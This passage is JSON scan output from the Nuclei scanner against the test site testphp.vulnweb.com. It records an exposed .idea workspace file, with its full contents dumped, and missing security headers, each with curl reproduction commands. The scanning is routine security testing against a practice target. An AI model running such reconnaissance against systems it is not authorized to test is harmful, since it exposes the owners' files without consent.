-\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:47.938213688Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 'http://testphp.vulnweb.com/wvstests'\",\"matcher-status\":true}\n{\"template\":\"http/exposures/files/idea-folder-exposure.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/idea-folder-exposure\",\"template-id\":\"idea-folder-exposure\",\"template-path\":\"/home/rengine/nuclei-templates/http/exposures/files/idea-folder-exposure.yaml\",\"info\":{\"name\":\"Public .idea Folder containing files with sensitive data\",\"author\":[\"martincodes-de\"],\"tags\":[\"phpstorm\",\"jetbrains\",\"idea\",\"exposure\",\"files\"],\"description\":\"Searches for .idea Folder by querying the /.idea and a few other files with sensitive data.\",\"severity\":\"info\",\"metadata\":{\"max-request\":2}},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/workspace.xml\",\"request\":\"GET /.idea/workspace.xml HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.62\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 12473\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: text/xml\\r\\nDate: Wed, 13 Nov 2024 02:42:48 GMT\\r\\nEtag: \\\"4f911ceb-30b9\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:23:07 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?\\u003e\\r\\n\\u003cproject version=\\\"4\\\"\\u003e\\r\\n \\u003ccomponent name=\\\"ChangeListManager\\\"\\u003e\\r\\n \\u003clist default=\\\"true\\\" id=\\\"190e5f86-a42c-4cc9-a03a-80ac0d47d6d2\\\" name=\\\"Default\\\" comment=\\\"\\\" /\\u003e\\r\\n \\u003cignored path=\\\"acuart.iws\\\" /\\u003e\\r\\n \\u003cignored path=\\\".idea/workspace.xml\\\" /\\u003e\\r\\n \\u003coption name=\\\"TRACKING_ENABLED\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"SHOW_DIALOG\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"HIGHLIGHT_CONFLICTS\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"HIGHLIGHT_NON_ACTIVE_CHANGELIST\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"LAST_RESOLUTION\\\" value=\\\"IGNORE\\\" /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"ChangesViewManager\\\" flattened_view=\\\"true\\\" show_ignored=\\\"false\\\" /\\u003e\\r\\n \\u003ccomponent name=\\\"CreatePatchCommitExecutor\\\"\\u003e\\r\\n \\u003coption name=\\\"PATCH_PATH\\\" value=\\\"\\\" /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"DaemonCodeAnalyzer\\\"\\u003e\\r\\n \\u003cdisable_hints /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"FavoritesManager\\\"\\u003e\\r\\n \\u003cfavorites_list name=\\\"acuart\\\" /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"FileEditorManager\\\"\\u003e\\r\\n \\u003cleaf\\u003e\\r\\n \\u003cfile leaf-file-name=\\\"cart.php\\\" pinned=\\\"false\\\" current=\\\"true\\\" current-in-tab=\\\"true\\\"\\u003e\\r\\n \\u003centry file=\\\"file://$PROJECT_DIR$/cart.php\\\"\\u003e\\r\\n \\u003cprovider selected=\\\"true\\\" editor-type-id=\\\"text-editor\\\"\\u003e\\r\\n \\u003cstate line=\\\"60\\\" column=\\\"26\\\" selection-start=\\\"2336\\\" selection-end=\\\"2336\\\" vertical-scroll-proportion=\\\"-0.41645244\\\"\\u003e\\r\\n \\u003cfolding\\u003e\\r\\n \\u003cmarker date=\\\"1334906567000\\\" expanded=\\\"true\\\" signature=\\\"3702:3950\\\" placeholder=\\\"...\\\" /\\u003e\\r\\n \\u003cmarker date=\\\"1334906567000\\\" expanded=\\\"true\\\" signature=\\\"4948:5056\\\" placeholder=\\\"...\\\" /\\u003e\\r\\n \\u003c/folding\\u003e\\r\\n \\u003c/state\\u003e\\r\\n \\u003c/provider\\u003e\\r\\n \\u003c/entry\\u003e\\r\\n \\u003c/file\\u003e\\r\\n \\u003c/leaf\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"Git.Settings\\\"\\u003e\\r\\n \\u003coption name=\\\"CHECKOUT_INCLUDE_TAGS\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"UPDATE_CHANGES_POLICY\\\" value=\\\"STASH\\\" /\\u003e\\r\\n \\u003coption name=\\\"LINE_SEPARATORS_CONVERSION\\\" value=\\\"ASK\\\" /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"IdeDocumentHistory\\\"\\u003e\\r\\n \\u003coption name=\\\"changedFiles\\\"\\u003e\\r\\n \\u003clist\\u003e\\r\\n \\u003coption value=\\\"$PROJECT_DIR$/.htaccess\\\" /\\u003e\\r\\n \\u003coption value=\\\"$PROJECT_DIR$/cart.php\\\" /\\u003e\\r\\n \\u003c/list\\u003e\\r\\n \\u003c/option\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"PhpWorkspaceProjectConfiguration\\\" backward_compatibility_performed=\\\"true\\\" /\\u003e\\r\\n \\u003ccomponent name=\\\"ProjectFrameBounds\\\"\\u003e\\r\\n \\u003coption name=\\\"x\\\" value=\\\"-8\\\" /\\u003e\\r\\n \\u003coption name=\\\"y\\\" value=\\\"-8\\\" /\\u003e\\r\\n \\u003coption name=\\\"width\\\" value=\\\"1296\\\" /\\u003e\\r\\n \\u003coption name=\\\"height\\\" value=\\\"1000\\\" /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"ProjectLevelVcsManager\\\" settingsEditedManually=\\\"false\\\"\\u003e\\r\\n \\u003cOptionsSetting value=\\\"true\\\" id=\\\"Add\\\" /\\u003e\\r\\n \\u003cOptionsSetting value=\\\"true\\\" id=\\\"Remove\\\" /\\u003e\\r\\n \\u003cOptionsSetting value=\\\"true\\\" id=\\\"Checkout\\\" /\\u003e\\r\\n \\u003cOptionsSetting value=\\\"true\\\" id=\\\"Update\\\" /\\u003e\\r\\n \\u003cOptionsSetting value=\\\"true\\\" id=\\\"Status\\\" /\\u003e\\r\\n \\u003cOptionsSetting value=\\\"true\\\" id=\\\"Edit\\\" /\\u003e\\r\\n \\u003cConfirmationsSetting value=\\\"0\\\" id=\\\"Add\\\" /\\u003e\\r\\n \\u003cConfirmationsSetting value=\\\"0\\\" id=\\\"Remove\\\" /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"ProjectReloadState\\\"\\u003e\\r\\n \\u003coption name=\\\"STATE\\\" value=\\\"0\\\" /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"ProjectView\\\"\\u003e\\r\\n \\u003cnavigator currentView=\\\"ProjectPane\\\" proportions=\\\"\\\" version=\\\"1\\\" splitterProportion=\\\"0.5\\\"\\u003e\\r\\n \\u003cflattenPackages /\\u003e\\r\\n \\u003cshowMembers /\\u003e\\r\\n \\u003cshowModules /\\u003e\\r\\n \\u003cshowLibraryContents ProjectPane=\\\"true\\\" /\\u003e\\r\\n \\u003chideEmptyPackages /\\u003e\\r\\n \\u003cabbreviatePackageNames /\\u003e\\r\\n \\u003cautoscrollToSource /\\u003e\\r\\n \\u003cautoscrollFromSource /\\u003e\\r\\n \\u003csortByType /\\u003e\\r\\n \\u003c/navigator\\u003e\\r\\n \\u003cpanes\\u003e\\r\\n \\u003cpane id=\\\"ProjectPane\\\"\\u003e\\r\\n \\u003csubPane\\u003e\\r\\n \\u003cPATH\\u003e\\r\\n \\u003cPATH_ELEMENT\\u003e\\r\\n \\u003coption name=\\\"myItemId\\\" value=\\\"acuart\\\" /\\u003e\\r\\n \\u003coption name=\\\"myItemType\\\" value=\\\"com.intellij.ide.projectView.impl.nodes.ProjectViewProjectNode\\\" /\\u003e\\r\\n \\u003c/PATH_ELEMENT\\u003e\\r\\n \\u003c/PATH\\u003e\\r\\n \\u003cPATH\\u003e\\r\\n \\u003cPATH_ELEMENT\\u003e\\r\\n \\u003coption name=\\\"myItemId\\\" value=\\\"acuart\\\" /\\u003e\\r\\n \\u003coption name=\\\"myItemType\\\" value=\\\"com.intellij.ide.projectView.impl.nodes.ProjectViewProjectNode\\\" /\\u003e\\r\\n \\u003c/PATH_ELEMENT\\u003e\\r\\n \\u003cPATH_ELEMENT\\u003e\\r\\n \\u003coption name=\\\"myItemId\\\" value=\\\"acuart\\\" /\\u003e\\r\\n \\u003coption name=\\\"myItemType\\\" value=\\\"com.intellij.ide.projectView.impl.nodes.PsiDirectoryNode\\\" /\\u003e\\r\\n \\u003c/PATH_ELEMENT\\u003e\\r\\n \\u003c/PATH\\u003e\\r\\n \\u003c/subPane\\u003e\\r\\n \\u003c/pane\\u003e\\r\\n \\u003cpane id=\\\"Scope\\\" /\\u003e\\r\\n \\u003c/panes\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"PropertiesComponent\\\"\\u003e\\r\\n \\u003cproperty name=\\\"WebServerToolWindowFactoryState\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"RunManager\\\"\\u003e\\r\\n \\u003clist size=\\\"0\\\" /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"ShelveChangesManager\\\" show_recycled=\\\"false\\\" /\\u003e\\r\\n \\u003ccomponent name=\\\"TaskManager\\\"\\u003e\\r\\n \\u003ctask active=\\\"true\\\" id=\\\"Default\\\" summary=\\\"Default task\\\"\\u003e\\r\\n \\u003ccreated\\u003e1334906472656\\u003c/created\\u003e\\r\\n \\u003cupdated\\u003e1334906472656\\u003c/updated\\u003e\\r\\n \\u003c/task\\u003e\\r\\n \\u003cservers /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"ToolWindowManager\\\"\\u003e\\r\\n \\u003cframe x=\\\"-8\\\" y=\\\"-8\\\" width=\\\"1296\\\" height=\\\"1000\\\" extended-state=\\\"6\\\" /\\u003e\\r\\n \\u003ceditor active=\\\"true\\\" /\\u003e\\r\\n \\u003clayout\\u003e\\r\\n \\u003cwindow_info id=\\\"Data Sources\\\" active=\\\"false\\\" anchor=\\\"right\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.33\\\" sideWeight=\\\"0.5\\\" order=\\\"-1\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Changes\\\" active=\\\"false\\\" anchor=\\\"bottom\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.33\\\" sideWeight=\\\"0.5\\\" order=\\\"-1\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"TODO\\\" active=\\\"false\\\" anchor=\\\"bottom\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.33\\\" sideWeight=\\\"0.5\\\" order=\\\"6\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Structure\\\" active=\\\"false\\\" anchor=\\\"left\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.25\\\" sideWeight=\\\"0.5\\\" order=\\\"1\\\" side_tool=\\\"true\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Project\\\" active=\\\"false\\\" anchor=\\\"left\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"true\\\" weight=\\\"0.20373377\\\" sideWeight=\\\"0.5\\\" order=\\\"0\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Debug\\\" active=\\\"false\\\" anchor=\\\"bottom\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.4\\\" sideWeight=\\\"0.5\\\" order=\\\"3\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Favorites\\\" active=\\\"false\\\" anchor=\\\"left\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.33\\\" sideWeight=\\\"0.5\\\" order=\\\"-1\\\" side_tool=\\\"true\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Event Log\\\" active=\\\"false\\\" anchor=\\\"bottom\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.33\\\" sideWeight=\\\"0.5\\\" order=\\\"-1\\\" side_tool=\\\"true\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Run\\\" active=\\\"false\\\" anchor=\\\"bottom\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.33\\\" sideWeight=\\\"0.5\\\" order=\\\"2\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Version Control\\\" active=\\\"false\\\" anchor=\\\"bottom\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.33\\\" sideWeight=\\\"0.5\\\" order=\\\"-1\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Cvs\\\" active=\\\"false\\\" anchor=\\\"bottom\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.25\\\" sideWeight=\\\"0.5\\\" order=\\\"4\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Message\\\" active=\\\"false\\\" anchor=\\\"bottom\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.33\\\" sideWeight=\\\"0.5\\\" order=\\\"0\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Find\\\" active=\\\"false\\\" anchor=\\\"bottom\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.33\\\" sideWeight=\\\"0.5\\\" order=\\\"1\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Ant Build\\\" active=\\\"false\\\" anchor=\\\"right\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.25\\\" sideWeight=\\\"0.5\\\" order=\\\"1\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Commander\\\" active=\\\"false\\\" anchor=\\\"right\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.4\\\" sideWeight=\\\"0.5\\\" order=\\\"0\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Inspection\\\" active=\\\"false\\\" anchor=\\\"bottom\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.4\\\" sideWeight=\\\"0.5\\\" order=\\\"5\\\" side_tool=\\\"false\\\" content_ui=\\\"tabs\\\" /\\u003e\\r\\n \\u003cwindow_info id=\\\"Hierarchy\\\" active=\\\"false\\\" anchor=\\\"right\\\" auto_hide=\\\"false\\\" internal_type=\\\"DOCKED\\\" type=\\\"DOCKED\\\" visible=\\\"false\\\" weight=\\\"0.25\\\" sideWeight=\\\"0.5\\\" order=\\\"2\\\" side_tool=\\\"false\\\" content_ui=\\\"combo\\\" /\\u003e\\r\\n \\u003c/layout\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"VcsContentAnnotationSettings\\\"\\u003e\\r\\n \\u003coption name=\\\"myLimit\\\" value=\\\"2678400000\\\" /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"VcsManagerConfiguration\\\"\\u003e\\r\\n \\u003coption name=\\\"OFFER_MOVE_TO_ANOTHER_CHANGELIST_ON_PARTIAL_COMMIT\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"CHECK_CODE_SMELLS_BEFORE_PROJECT_COMMIT\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"CHECK_NEW_TODO\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"myTodoPanelSettings\\\"\\u003e\\r\\n \\u003cvalue\\u003e\\r\\n \\u003care-packages-shown value=\\\"false\\\" /\\u003e\\r\\n \\u003care-modules-shown value=\\\"false\\\" /\\u003e\\r\\n \\u003cflatten-packages value=\\\"false\\\" /\\u003e\\r\\n \\u003cis-autoscroll-to-source value=\\\"false\\\" /\\u003e\\r\\n \\u003c/value\\u003e\\r\\n \\u003c/option\\u003e\\r\\n \\u003coption name=\\\"PERFORM_UPDATE_IN_BACKGROUND\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"PERFORM_COMMIT_IN_BACKGROUND\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"PERFORM_EDIT_IN_BACKGROUND\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"PERFORM_CHECKOUT_IN_BACKGROUND\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"PERFORM_ADD_REMOVE_IN_BACKGROUND\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"PERFORM_ROLLBACK_IN_BACKGROUND\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"CHECK_LOCALLY_CHANGED_CONFLICTS_IN_BACKGROUND\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"ENABLE_BACKGROUND_PROCESSES\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"CHANGED_ON_SERVER_INTERVAL\\\" value=\\\"60\\\" /\\u003e\\r\\n \\u003coption name=\\\"SHOW_ONLY_CHANGED_IN_SELECTION_DIFF\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"CHECK_COMMIT_MESSAGE_SPELLING\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"DEFAULT_PATCH_EXTENSION\\\" value=\\\"patch\\\" /\\u003e\\r\\n \\u003coption name=\\\"SHORT_DIFF_HORISONTALLY\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"SHORT_DIFF_EXTRA_LINES\\\" value=\\\"2\\\" /\\u003e\\r\\n \\u003coption name=\\\"SOFT_WRAPS_IN_SHORT_DIFF\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"INCLUDE_TEXT_INTO_PATCH\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"INCLUDE_TEXT_INTO_SHELF\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"CREATE_PATCH_EXPAND_DETAILS_DEFAULT\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"FORCE_NON_EMPTY_COMMENT\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"LAST_COMMIT_MESSAGE\\\" /\\u003e\\r\\n \\u003coption name=\\\"MAKE_NEW_CHANGELIST_ACTIVE\\\" value=\\\"true\\\" /\\u003e\\r\\n \\u003coption name=\\\"OPTIMIZE_IMPORTS_BEFORE_PROJECT_COMMIT\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"CHECK_FILES_UP_TO_DATE_BEFORE_COMMIT\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"REFORMAT_BEFORE_PROJECT_COMMIT\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"REFORMAT_BEFORE_FILE_COMMIT\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"FILE_HISTORY_DIALOG_COMMENTS_SPLITTER_PROPORTION\\\" value=\\\"0.8\\\" /\\u003e\\r\\n \\u003coption name=\\\"FILE_HISTORY_DIALOG_SPLITTER_PROPORTION\\\" value=\\\"0.5\\\" /\\u003e\\r\\n \\u003coption name=\\\"ACTIVE_VCS_NAME\\\" /\\u003e\\r\\n \\u003coption name=\\\"UPDATE_GROUP_BY_PACKAGES\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"UPDATE_GROUP_BY_CHANGELIST\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"SHOW_FILE_HISTORY_AS_TREE\\\" value=\\\"false\\\" /\\u003e\\r\\n \\u003coption name=\\\"FILE_HISTORY_SPLITTER_PROPORTION\\\" value=\\\"0.6\\\" /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"XDebuggerManager\\\"\\u003e\\r\\n \\u003cbreakpoint-manager /\\u003e\\r\\n \\u003c/component\\u003e\\r\\n \\u003ccomponent name=\\\"editorHistoryManager\\\"\\u003e\\r\\n \\u003centry file=\\\"file://$PROJECT_DIR$/.htaccess\\\"\\u003e\\r\\n \\u003cprovider selected=\\\"true\\\" editor-type-id=\\\"text-editor\\\"\\u003e\\r\\n \\u003cstate line=\\\"6\\\" column=\\\"0\\\" selection-start=\\\"213\\\" selection-end=\\\"222\\\" vertical-scroll-proportion=\\\"0.124847\\\"\\u003e\\r\\n \\u003cfolding /\\u003e\\r\\n \\u003c/state\\u003e\\r\\n \\u003c/provider\\u003e\\r\\n \\u003c/entry\\u003e\\r\\n \\u003centry file=\\\"file://$PROJECT_DIR$/cart.php\\\"\\u003e\\r\\n \\u003cprovider selected=\\\"true\\\" editor-type-id=\\\"text-editor\\\"\\u003e\\r\\n \\u003cstate line=\\\"60\\\" column=\\\"26\\\" selection-start=\\\"2336\\\" selection-end=\\\"2336\\\" vertical-scroll-proportion=\\\"-0.41645244\\\"\\u003e\\r\\n \\u003cfolding\\u003e\\r\\n \\u003cmarker date=\\\"1334906567000\\\" expanded=\\\"true\\\" signature=\\\"3702:3950\\\" placeholder=\\\"...\\\" /\\u003e\\r\\n \\u003cmarker date=\\\"1334906567000\\\" expanded=\\\"true\\\" signature=\\\"4948:5056\\\" placeholder=\\\"...\\\" /\\u003e\\r\\n \\u003c/folding\\u003e\\r\\n \\u003c/state\\u003e\\r\\n \\u003c/provider\\u003e\\r\\n \\u003c/entry\\u003e\\r\\n \\u003c/component\\u003e\\r\\n\\u003c/project\\u003e\\r\\n\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:48.540147242Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.62' 'http://testphp.vulnweb.com/.idea/workspace.xml'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\